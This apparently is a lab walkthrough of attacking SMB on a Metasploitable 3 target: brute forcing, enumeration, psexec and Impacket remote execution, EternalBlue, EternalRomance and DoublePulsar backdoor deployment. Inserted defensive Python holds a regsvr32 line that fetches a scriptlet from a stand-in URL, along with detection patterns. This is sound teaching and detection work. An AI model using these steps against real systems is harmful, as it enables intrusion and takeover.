Exploiting Port 445 – SMB
This port is used by Server Message Block (SMB) for sharing files between different operating systems, i.e. Windows-Windows, Unix-Unix and Unix-Windows.
While port 139 is known technically as “NBT over IP”, port 445 is “SMB over IP”. Server Message Block is also known in modern usage as the Common Internet File System (CIFS). It operates as an application-layer network protocol primarily used to offer shared access to files, printers, serial ports and other kinds of communication between nodes on a network.
One of the first things you can try is to brute force your access.
Brute forcing SMB using Metasploit
Try using the credentials already in the database:
Brute forcing SMB using Hydra
Create and use a custom list for users and passwords:
Brute forcing SMB using Nmap
Nmap could also be used to brute force the SMB service. Unfortunately, the smb-brute script is not working anymore…
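From the defender's side, the brute forcing above shows up as a burst of failed network logons. The block below is an added example, not part of the original post: it scans constructed Windows Security log records (Event ID 4625 for a failure, 4624 for a success, logon type 3 for the network logons SMB uses) and flags any source that exceeds a threshold inside a sliding window; the account names and addresses are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security log records, reduced to
# (timestamp, event id, logon type, account name, source address).
SAMPLE_EVENTS = [
    ("2024-03-01 10:00:00", 4625, 3, "vagrant", "10.0.0.5"),
    ("2024-03-01 10:00:01", 4625, 3, "vagrant", "10.0.0.5"),
    ("2024-03-01 10:00:01", 4625, 3, "Administrator", "10.0.0.5"),
    ("2024-03-01 10:00:02", 4625, 3, "sshd", "10.0.0.5"),
    ("2024-03-01 10:00:03", 4625, 3, "vagrant", "10.0.0.5"),
    ("2024-03-01 10:00:03", 4624, 3, "vagrant", "10.0.0.5"),
    ("2024-03-01 10:30:00", 4625, 3, "alice", "10.0.0.9"),
    ("2024-03-01 11:00:00", 4625, 2, "bob", "-"),
]

def detect_smb_bruteforce(events, threshold=4, window=timedelta(seconds=60)):
    """Return {source: (max failures in any window, distinct accounts tried)}
    for every source that reached `threshold` network logon failures (4625,
    logon type 3) inside `window`. Many accounts from one source in a short
    burst is the spraying pattern; one account hammered is classic brute force."""
    failures = defaultdict(list)
    for ts, event_id, logon_type, user, src in events:
        if event_id == 4625 and logon_type == 3:
            failures[src].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), user))
    alerts = {}
    for src, hits in failures.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:   # slide the window
                start += 1
            count = end - start + 1
            if count >= threshold and count > alerts.get(src, (0, 0))[0]:
                alerts[src] = (count, len({u for _, u in hits[start:end + 1]}))
    return alerts

def successes_after_bruteforce(events, alerts):
    """Successful network logons (4624) from a flagged source: the event a
    responder cares about most, since it means one of the guesses worked."""
    return {(src, user) for _, event_id, logon_type, user, src in events
            if event_id == 4624 and logon_type == 3 and src in alerts}
```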
Enumerating SMB using Metasploit
Several tools can be used to extract information from the target via the SMB service. As expected, Metasploit has a number of modules that can be used against SMB to enumerate the remote machine:
You will get a significant amount of information:
- SMB versions supported (might be vulnerable)
- Shared drives (might be exploitable)
- Usernames (might be used to exploit other services)
- User Security Identifiers (might be used for exploitation)
Enumerating SMB using Nmap
Nmap has many NSE scripts that can be used against hosts where the SMB service is running, but not all of them return useful results:
Nmap can also be used as a light vulnerability scanner, with some specific scripts specially written for port 445 services.
Enumerating SMB using smbclient
There are several other tools available in Kali Linux to enumerate the SMB service.
You can use a tool called smbclient to connect to the Metasploitable 3 box and list the available shares, but you will need a valid username/password.
NOTE: In the current Kali version you will need to edit the /etc/samba/smb.conf to get the proper results.
Enumerating SMB using smbmap
These results from smbmap are critical because you can see that two of the shared folders are writable, therefore potentially exploitable.
Enumerating SMB using enum4linux
By being patient and using several tools, you will get a lot of useful information about your target. Other tools are available but, in this case, they return nothing at all.
After the enumeration, and using the information retrieved, you can now exploit your target via the SMB service.
Exploiting SMB using Metasploit
MSF has a number of modules available to exploit SMB:
Windows Authenticated User Code Execution
This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. It is similar to the “psexec” utility provided by SysInternals. The module is now able to clean up after itself; the service it creates uses a randomly chosen name and description.
Authenticated PowerShell Command Execution
The old psexec_psh module is now deprecated, but you can get its functionality by selecting a different target on the psexec module (Target 1-PowerShell). This option uses a valid administrator username and password to execute a PowerShell payload, using a technique similar to the “psexec” utility provided by SysInternals. The payload is base64-encoded and executed from the command line using the -EncodedCommand flag. With this method the payload is never written to disk and, since each payload is unique, it is less prone to signature-based detection.
Windows Authenticated Administration Utility
This module uses a valid administrator username and password to execute an arbitrary command on one or more hosts, using a technique similar to the “psexec” utility provided by SysInternals. Daisy-chaining commands with ‘&’ doesn’t work, so don’t waste your time trying. This module is useful because it doesn’t need to upload any binaries to the target machine.
This is in fact a two-stage attack:
- First, use a module (web delivery) to generate the malicious DLL code, which you can use as the arbitrary command on the host.
- Select the appropriate target (Target 3-Regsvr32) and payload.
- Then use another module (psexec_command) to run that code on the remote machine.
As soon as you run the auxiliary module psexec_command you will get a Meterpreter session with SYSTEM privileges.
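The psexec-style modules above leave traces a defender can look for in the System log: a service installation (Event ID 7045) with a random name whose binary was copied in through ADMIN$, a service command line that is an encoded PowerShell one-liner, or a regsvr32 call fetching a scriptlet from a URL as the Regsvr32 web delivery target does. The block below is an added example that is not part of the original post; the service records and the 192.0.2.10 address are constructed, and the name heuristic (counting case switches) is my own assumption about what separates random names from real ones.

```python
import base64
import re

# Constructed System log 7045 records, reduced to (service name, image path /
# command line). The 192.0.2.10 address and the service names are made up.
SAMPLE_SERVICES = [
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("wuauserv", r"C:\Windows\system32\svchost.exe -k netsvcs"),
    ("ghRtQzLp", r"\\127.0.0.1\ADMIN$\ghRtQzLp.exe"),
    ("KmXuWqve", "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e "
                 + base64.b64encode("Write-Host hello".encode("utf-16-le")).decode()),
    ("AbCdEfGh", "regsvr32 /s /n /u /i:http://192.0.2.10:8080/x.sct scrobj.dll"),
]

def case_transitions(name):
    """Count lower/upper switches: real service names rarely have many,
    random alphabetic names almost always do (heuristic, an assumption)."""
    return sum(1 for a, b in zip(name, name[1:]) if a.islower() != b.islower())

def decode_encoded_command(cmdline):
    """Return the script behind PowerShell's -EncodedCommand (or its short
    forms -e / -ec / -enc) when the command line carries one, else None."""
    m = re.search(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")  # UTF-16LE by spec
    except (ValueError, UnicodeDecodeError):
        return None

def triage_service_installs(records):
    """Return [(service name, [reasons])] for every suspicious install."""
    findings = []
    for name, cmd in records:
        reasons = []
        if name.isalpha() and case_transitions(name) >= 4:
            reasons.append("random-looking service name")
        if re.search(r"\\ADMIN\$\\", cmd, re.I):
            reasons.append("binary dropped via ADMIN$ share")
        if re.search(r"regsvr32.*\s/i:https?://", cmd, re.I):
            reasons.append("regsvr32 loading a scriptlet from a URL")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            reasons.append("encoded PowerShell: " + decoded)
        if reasons:
            findings.append((name, reasons))
    return findings
```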
Impacket WMI Exec
Impacket is a collection of Python classes and functions for working with various Windows network protocols. It is a centerpiece of many different pentesting tools. Apart from being a library, it also contains a number of examples which you can use right away for remote command execution.
The following table provides a summary of all the Impacket remote code execution methods discussed:
| Method | RCE type | Port(s) used |
| --- | --- | --- |
| psexec.py | interactive shell | tcp/445 |
| dcomexec.py | semi-interactive shell | tcp/135, tcp/445, tcp/49751 (DCOM) |
| smbexec.py | semi-interactive shell | tcp/445 |
| wmiexec.py | semi-interactive shell | tcp/135, tcp/445, tcp/50911 (Winmgmt) |
| atexec.py | command | tcp/445 |
This module uses a similar approach to psexec but executes commands through WMI.
Unfortunately, this module doesn’t work in the current Kali release due to Python syntax incompatibilities. The previous image was obtained using Kali 2019.1.
Impacket DCOM Exec
A different approach is to use DCOM to execute remote commands, like creating a user or anything else:
Unfortunately, this module also doesn’t work in the current Kali release. But there is another module that tries to dump hashes from the remote machine without executing any agent there.
Other Metasploit modules
There are other modules created to attack the SMB service, but they require some social engineering because the target needs to access a share on the attacker's machine:
- NTLM Capture (auxiliary/server/capture/smb)
  - This module provides an SMB service that can be used to capture the challenge-response password hashes of SMB client systems.
  - It needs to run in coordination with auxiliary/spoof/nbns/nbns_response.
- DoS (auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop)
  - It will just crash the remote machine.
Eternal Romance Exploit
Eternal Romance is one of the SMBv1 exploits from the leaked NSA exploit collection. This module exploits the MS17-010 vulnerabilities in SMB to achieve a write-what-where primitive, which is then used to overwrite the connection session information so that it becomes an Administrator session. From there, the normal psexec payload code execution is done:
Check if target is vulnerable:
Exploit:
It is also possible to use the web delivery method to exploit this vulnerability:
- Run the exploit/multi/script/web_delivery module (set Target 3-Regsvr32)
- Get a command
- Run the auxiliary/admin/smb/ms17_010_command module
- Use the previous command
- Get a Meterpreter shell
Eternal Blue Exploit
Eternal Blue is the exploit used to launch the famous WannaCry ransomware attack. Try using Nmap to check for this vulnerability:
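To turn the Nmap check above into a patch list, the added example below (not part of the original post) parses an Nmap XML report (-oX) for the result of the smb-vuln-ms17-010 script. The XML sample is constructed and trimmed; it assumes the layout of Nmap's vulns library, in which each finding is a <table> holding an <elem key="state">, and the 192.0.2.x addresses are made up.

```python
import xml.etree.ElementTree as ET

# Constructed, trimmed Nmap XML report (nmap --script smb-vuln-ms17-010 -oX).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun>
  <host><address addr="192.0.2.20" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host><address addr="192.0.2.21" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="NOT VULNERABLE">
        <table key="CVE-2017-0143"><elem key="state">NOT VULNERABLE</elem></table>
      </script>
    </hostscript>
  </host>
  <host><address addr="192.0.2.22" addrtype="ipv4"/></host>
</nmaprun>"""

def ms17_010_status(xml_text, script_id="smb-vuln-ms17-010"):
    """Map each host's IPv4 address to the state the script reported, or to
    "not checked" when the script produced no result for that host (for
    example because port 445 was closed or filtered)."""
    status = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        state = "not checked"
        for script in host.iter("script"):
            if script.get("id") != script_id:
                continue
            elem = script.find(".//elem[@key='state']")
            state = elem.text.strip() if elem is not None and elem.text else "unknown"
        status[addr.get("addr")] = state
    return status

def hosts_needing_patch(xml_text):
    """Hosts still exposing the SMBv1 flaw; these need MS17-010 applied."""
    return sorted(h for h, s in ms17_010_status(xml_text).items() if s == "VULNERABLE")
```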
Exploit:
Double Pulsar Exploit
You can deploy a backdoor to the remote machine. First, clone the appropriate GitHub repository:
NOTE: You need to install wine32 before running this script:
- dpkg --add-architecture i386
- apt-get update
- apt-get install -y wine32
Deploy the backdoor:
Exploit using Metasploit
Exploiting SMB using Impacket
The psexec.py script lets you execute processes on remote Windows systems, copy files to remote systems, process their output and stream it back. It allows execution of remote shell commands directly through a full interactive console without having to install any client software.
The smbexec.py method takes advantage of the native Windows SMB functionality to execute arbitrary commands on the remote system. This approach does not require anything to be uploaded on the remote system and is therefore somewhat less prone to detection.
The wmiexec.py script uses the Windows Management Instrumentation (WMI) interface of the remote Windows system to spawn a semi-interactive shell. Similarly to the dcomexec method, wmiexec requires communication over three network ports/services.
First it uses ports tcp/135 and tcp/445, and ultimately it communicates with the Winmgmt Windows service over a dynamically allocated high port such as tcp/50911. This makes the wmiexec method noisier than the other methods.
There are other Impacket scripts, not all of them allowing RCE but some of them potentially very useful against a Domain Controller. You can find them at /usr/share/doc/python3-impacket/examples.
2 comments:
Where did you get /usr/share/wordlists/Metasploitable3Win_user.txt?